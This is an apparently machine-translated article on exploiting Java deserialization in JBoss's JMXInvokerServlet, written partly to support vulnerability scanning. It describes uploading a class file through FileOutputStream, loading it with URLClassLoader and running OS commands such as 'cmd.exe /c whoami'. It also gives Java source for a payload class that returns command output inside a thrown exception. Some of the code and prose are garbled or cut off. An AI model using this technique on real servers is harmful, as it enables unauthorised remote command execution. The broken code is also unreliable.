Java deserialization vulnerability execution command echo implementation and Exploit download

Java deserialization vulnerability execution command echo implementation and Exploit download

Some of the technologies and tools mentioned in this article may be offensive and only for safe learning and teaching purposes. Illegal use is prohibited!

0 × 00 Preface

Some time ago, the deserialization vulnerability of java was so popular that, from the very beginning, a payload generator that could execute OS commands from a foreign cow, to the later use of URLClassLoader to load remote classes to rebound the shell. However, the company needs to add rules to identify such vulnerabilities, and the customer's vulnerability scanning often works in a pure Intranet environment. Therefore, the method of remote class loading does not work. I want to write a utility by myself, so I have the following article (this article uses JBOSS as an example ).

0 × 01 target

1. EXP can only use resources on the server's Local Machine and cannot load remote classes. 2. upload any file to any directory. 3. Obtain the echo content of command execution.

0 × 02 implementation

EXP can only use resources on the server's Local Machine and cannot load remote classes:

By analyzing the cause of the vulnerability, we can only use chained calls to execute java statements. In other words, the statements we want to execute must be written into a row without a semicolon: (in fact, this is a good breakthrough. We only need to execute any code we want (no matter how long) compile the code locally into a class and upload the class bytecode to the server. Then the question comes again. How can I upload the file? What path can I upload the file? You can use the FileOutputStream class to upload files. The upload path is simpler and you can directly upload files to FileOutputStream. "In the past, I uploaded the file to the current directory where the program is running, with the code: new FileOutputStream (". /payload. class "). write (new byte [] {0xXX, 0xXX ......}). After the upload problem is solved, it is easy to execute the following code: java.net. URLClassLoader. getConstructor (java.net. URL []. class ). newInstance (new java.net. URL [] {new java.net. URL ("file :. /")}). loadClass ("payload "). newinstance(cmd.exe/c whoami ").

In this way, our two goals are solved. We only use the server's local resources and do not need to connect to the Internet. We can upload any files to any directory.

Obtain command echo content:

By analyzing the returned results of invoker/JMXInvokerServlet in JBOSS, it is known that the returned result is a MarshalledValue object, which encapsulates the return values of invoker/JMXInvokerServlet. if an exception is thrown during execution, an InvocationException object is encapsulated in the MarshalledValue object. The idea here is very clear. For java exceptions, a constructor can pass the String parameter, we can take the result of command execution in the class file in step 1 as a parameter to construct an Exception, and then in payload. class finally throw this Exception, so that the Exception with ECHO content will be encapsulated in the MarshalledValue object and returned through the http protocol. We only need to unpackage the returned MarshalledValue object, you can get the echo content.

The source code of payload. java is given below:

import java.io.BufferedReader;import java.io.InputStreamReader;public class RunCheckConfig {    public RunCheckConfig(String  args) throws Exception    {        Process proc = Runtime.getRuntime().exec(args);        BufferedReader br = new BufferedReader(new InputStreamReader(proc.getInputStream()));        StringBuffer sb = new StringBuffer();        String line;        while ((line = br.readLine()) != null)        {            sb.append(line).append("\n");        }        String result = sb.toString();        Exception e=new Exception(result);        throw e;        }    }

Source code of the unpacking program:

Public static void main (String args []) throws Exception {FileInputStream FCM = new FileInputStream ("d:/response. bin "); byte TempByte [] = new byte [5000*1000]; int length = Fi. read (TempByte); int ClassStart = 0; for (int I = 0; I
 
  
The following is the decommission:
  

  
 
  
0 × 03 Summary
  
The three goals in this article have been completed.
  
For the purpose of this article, it is easier to determine whether a vulnerability exists through a vulnerability scan. You only need a single code: new FileOutputStream ("\ u0000 ");, then, find the string "java. io. fileNotFoundException ", or, as we did earlier, unpack and determine whether the exception type is java. io. fileNotFoundException.
  
In addition, the finished product of the Exploit is attached and is for research only. Do not use it for any illegal activities: